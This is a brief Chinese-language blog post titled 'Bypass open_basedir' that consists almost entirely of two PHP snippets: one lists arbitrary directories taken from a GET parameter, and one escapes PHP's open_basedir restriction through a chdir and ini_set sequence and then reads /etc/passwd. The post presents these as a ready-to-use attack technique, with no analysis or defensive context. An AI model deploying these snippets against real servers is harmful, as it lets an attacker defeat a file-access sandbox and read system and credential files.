Bypass open_basedir
2021年03月08日 |
列目录 test.php?c=/tmp/
<?php
$c = $_GET['c'];
$a = new DirectoryIterator($c);
foreach($a as $f){
echo($f->__toString().'<br>');
}
?>读文件
<?php
mkdir('minx');
chdir('minx');
ini_set('open_basedir','..'); chdir('..');chdir('..');chdir('..');chdir('..');
ini_set('open_basedir','/');
echo file_get_contents('/etc/passwd');
?>
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!